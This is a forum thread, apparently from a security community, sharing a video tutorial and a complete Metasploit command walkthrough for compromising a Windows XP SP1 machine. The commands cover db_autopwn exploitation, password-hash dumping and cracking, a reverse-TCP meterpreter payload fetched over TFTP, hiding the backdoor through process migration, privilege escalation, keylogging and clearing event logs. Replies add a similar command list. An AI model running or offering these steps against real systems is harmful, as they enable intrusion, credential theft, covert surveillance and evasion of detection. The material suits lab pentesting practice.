[Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4644349/
Download video: http://www.mediafire.com/?cyxtis1ymly84f5
What is this?
This guide shows how to setup PostgreSQL as the database to power metasploit, which then leads onto using metasploit's db_autopwn features to carry out a collection of remote exploits in an attempt to gain access to the target system(s). When/If access has been gained; it shows a few basic things afterwards, such as:
- Gathering information – OS, interfaces, privilege level, running processes, idle time, screen shoots and keylogging
- Cracking user's passwords – Finding passwords to access the system
- Gaining shell access – Then transferring meterpreter agent via TFTP
- Handling multiple sessions – Which vulnerability to interact with.
- Process migration – Move code into another process
- Privilege escalation - Attempt to gain SYSTEM level privileges.
- File management – Navigation, Down/Up-load, editing, viewing files/folders
- Program control – Execution and Killing programs
- Misc – Covering tracks and Power management
Guide
- Configure PostgreSQL database to be able to function with metasploit
- Setup metasploit to use PostgreSQL and how to connect automatically at startup
- Use nmap from metasploit to scan for target(s)
- Running db_autopwn to attempt to run a collection of remote exploit(s) on discovered target(s) (The two exploits which work were: windows/smb/ms04_011_lsass and windows/dcerpc/ms03_026_dcom)
- Dump the hash table, then by using John The Ripper break password(s)
- Using an alternative method rather than meterpreter to transfer files, TFTP (Useful if you only have shell accesses and wish to use meterpreter shell instead OR interact with another system)
- Migrating to a different process which hides backdoor from running process lists (makes it less obvious of injection and allows the backdoor to be deleted if needed. Plus if the services that were exploited didn't have interactive access to the desktop, it now would)
- Escalate Privilege which allows the attacker to gain more control over the system.
- Various commands to navigate through the file system as well as altering the file structure.
- Basic commands to collect information about the system & user.
What do I need?
- PostgreSQL – (Can be found on BackTrack 4-R2)
- Metasploit – (Can be found on BackTrack 4-R2)
- Nmap – (Can be found on BackTrack 4-R2)
- TFTPD – (Can be found on BackTrack 4-R2)
- Text Editor – (Kate can be found on BackTrack 4-R2)
Commands:
Code:
/etc/init.d/postgresql-8.3 start
/etc/init.d/postgresql-8.3 status
passwd -d postgres
su postgres
psql
ALTER USER postgres WITH PASSWORD 'g0tmi1k';
\q
passwd
psql -l
createdb msf
psql -l
exit
clear
msfconsole
db_driver
db_driver postgresql
db_connect postgres:g0tmi1k@127.0.0.1/msf
exit
kate ~/.msf3/msfconsole.rc
db_driver postgresql
db_connect postgres:g0tmi1k@127.0.0.1/msf
db_workspace -a msf
clear
msfconsole
db_hosts
db_nmap -O -sS -sV -v 192.168.0.100-110 #192.168.0.0/24 -A
db_hosts
db_autopwn -t -p -e -b #db_autopwn -t -x -e -r -T 30
clear
sessions -l -v
sessions -i 1
sysinfo
ipconfig
getuid
hashdump
kate -> paste -> Save: ~/hashdump
cd /pentest/passwords/jtr/
./john ~/hashdump
clear
start-tftpd
cd /tmp
ifconfig
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.33 X > g0tmi1k.exe
ls
background
clear
search handler
use multi/handler
show options
exploit -j
sessions -i 1
shell
cd C:\
tftp *-i 192.168.0.105 GET g0tmi1k.exe
g0tmi1k.exe
exit
sessions -l -v
sessions -i 3
getuid
ps
migrate [Explorer.EXE]
getuid
getsystem #getprivs if not enabled, migrate if that fails - and try again
getuid
pwd
cd C:/
ls
mkdir g0tmi1k
ls
cd g0tmi1k
ls
pwd
getwd
lpwd
echo have you... > /tmp/message.txt
upload /tmp/message.txt C:/g0tmi1k/
ls
edit message.txt
A -> g0tmi1k? -> esc -> :wq
cat C:/g0tmi1k/message.txt
download message.txt /tmp/
execute -*f notepad -a message.txt
del message.txt
ls
cd \
ls
rmdir g0tmi1k
ls
ps
kill [notepad]
idletime
screenshot
run keylogrecorder
mail.google.com thisismyusername thisismypassword
clearev
shutdown
exit
kate -> open -> /path/to/key/logger/file/which/
Notes:
- I had deleted postgres's password before recording the video. This is the reason why it didn't prompt me for "(Current) UNIX password:". The solution would be to type "passwd -d postgres" before "su postgres". The commands have been updated to reflex this.
- Metasploit can do A LOT more – this is a brief insight to it
- db_autopwn may not work on your chosen target - Target in the video is running Windows XP SP1
- db_autopwn is “noisy” as it tries a mass of exploits.
- Windows XP by default has a TFTP client built into it, Windows 7 doesn't.
Song: Luke Solomon – Liquid & Bungalove - Saturday Song
Video length: 10:28
Capture length: 25:01
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Great Video man,nice work too keep it on .
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
nice work man .. xp system is still being used nowadays .. but i prefer facing WIN7 ...
btw nice work boy
go fw
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
I found by chance a similar video, but with SP3, dunnow if its interesting...
http://www.youtube.com/watch?v=dKLWvGWA-Ow
From the Description Box:
How to own a Windows XP SP3 Box with Metasploit / Backtrack.
Tutorial: Metasploit DB Autopwning
Commands:
/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start metasploit
db_connect pentest # connect to database
db_nmap HOST IP/ HOSTNAME # Scan for open Ports
db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports
Wait until a Meterpreter Session, like:
*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)
Wait until the Attack is over or STRG+C to Terminate the Attack.
Now:
Sessions # shows your connects to the victim
Session -i 1 # you join session 1
shell # opens reverse shell on victim
Use the help function, to get information about other available commands.
FOR EDUCATIONAL PURPOSES ONLY
Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)
Quote:
Originally Posted by
m4jh0l
Great Video man,nice work too keep it on .
Quote:
Originally Posted by
pusherman
Thanks for the tutorial.
Thanks for the feedback :)
Quote:
Originally Posted by
m0j4h3d
nice work man .. xp system is still being used nowadays .. but i prefer facing WIN7 ...
btw nice work boy
go fw
Yes they are, however, XP SP1 are "rare".
I do plan to get to Windows 7 - just want to do a few OSs/SPs between then tho ;)
Quote:
Originally Posted by
MartinBishop
Thanks for sharing. Ive had a quick look at the video and on the targets machine, they have got VNC installed...
In my demos it is a fresh install of the OS and SP, without any other software install, using the default values. Im not what sure what exploit was used to create the session(s).
I am soon recording my take on XP SP3. :)
